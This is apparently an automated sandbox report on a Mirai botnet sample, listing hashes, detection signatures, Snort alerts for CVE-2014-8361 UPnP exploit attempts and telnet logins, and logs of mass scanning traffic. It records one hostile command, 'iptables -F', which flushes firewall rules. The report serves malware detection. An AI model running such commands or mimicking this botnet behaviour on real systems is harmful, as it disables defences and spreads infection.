Linux Analysis Report x86

Overview

General Information

Sample Name: x86
Analysis ID: 519694
MD5: 776097f22f49b5f4c467e2afdee63009
SHA1: 540cb7d95922f31459afb94d6b37827b41bf677e
SHA256: c817429ed299ec43b67bf47aad81081496d8ab45afe231890bdb564f4bf4db7d
Tags: Mirai
Infos:

Most interesting Screenshot:

Detection

Mirai
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Deletes all firewall rules
Connects to many ports of the same IP (likely port scanning)
Sample deletes itself
Sample is packed with UPX
Uses known network protocols on non-standard ports
Deletes security-related log files
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: x86 Virustotal: Detection: 35% Perma Link
Source: x86 ReversingLabs: Detection: 34%

Bitcoin Miner:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5278) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5284) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5286) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5410) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5456) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5571) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50586 -> 41.194.8.47:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38424 -> 156.238.37.12:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60690
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59040
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60690
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40048 -> 156.224.144.253:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59040
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60706
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37264 -> 156.224.184.120:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32874 -> 156.224.186.0:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59068
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60672 -> 156.224.225.184:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60706
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59068
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60238 -> 156.237.4.71:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60798
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59166
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60798
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35894 -> 156.224.231.224:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54748 -> 156.237.4.43:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47428 -> 41.137.43.57:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 123.20.225.64:23 -> 192.168.2.23:53772
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 123.20.225.64:23 -> 192.168.2.23:53772
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59166
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60864
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45364 -> 156.224.133.31:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40198 -> 156.240.105.222:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46296 -> 156.238.37.7:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 220.82.194.50:23 -> 192.168.2.23:42092
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59296
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34352 -> 156.224.195.193:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60864
Source: Traffic Snort IDS: 2023452 ET TROJAN Possible Linux.Mirai Login Attempt (Zte521) 192.168.2.23:43926 -> 115.236.80.21:23
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:32800
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59296
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60080 -> 156.224.161.59:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:32800
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59476
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 14.188.134.188:23 -> 192.168.2.23:49364
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 14.188.134.188:23 -> 192.168.2.23:49364
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:32936
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59476
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53002 -> 156.224.254.62:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:32936
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59640
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54830 -> 156.224.169.221:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:33110
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59640
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50224 -> 156.230.25.53:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43062 -> 156.253.71.58:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46170 -> 156.224.189.120:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44702 -> 156.238.49.125:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50048 -> 156.232.90.190:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:33110
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58386 -> 156.238.44.77:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59738
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:33176
Source: Traffic Snort IDS: 716 INFO TELNET access 177.116.137.19:23 -> 192.168.2.23:53738
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59738
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:33176
Source: Traffic Snort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59808
Source: Traffic Snort IDS: 716 INFO TELNET access 220.82.194.50:23 -> 192.168.2.23:42604
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55360 -> 156.224.239.208:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:33246
Source: Traffic Snort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59808
Source: Traffic Snort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:33246
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44014 -> 41.78.122.116:52869
Deletes all firewall rules
Source: /bin/sh (PID: 5272) Args: iptables -F Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 197.253.96.115 ports 2,5,6,8,9,52869
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 55398 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 57708 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50586 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60950 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 17012
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 57248 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58332 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34352 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54830 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43062 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44014 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.132.235.75:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.64.238.75:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.169.115.49:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.223.17.18:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.243.213.175:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.162.0.34:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.205.100.111:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.217.17.76:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.236.63.110:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.250.231.228:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.66.156.222:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.187.70.94:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.145.181.70:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.88.123.182:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.4.20.59:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.148.250.73:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.50.184.22:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.9.220.181:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.15.78.63:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.226.3.102:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.33.233.51:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.239.48.166:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.125.79.166:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.45.213.65:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.254.225.88:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.39.106.97:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.61.177.151:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.188.169.108:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.219.220.143:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.46.33.194:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.90.119.104:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.15.87.149:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.72.111.79:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.185.178.168:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.112.150.242:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.53.243.40:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.246.254.187:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.182.248.223:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.204.147.67:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.219.77.194:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.104.90.28:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.60.22.180:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.38.175.166:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.180.177.204:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.199.51.96:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.10.166.184:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.179.58.201:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.217.58.0:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.94.149.198:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.147.188.138:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.124.129.249:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.101.220.63:37215
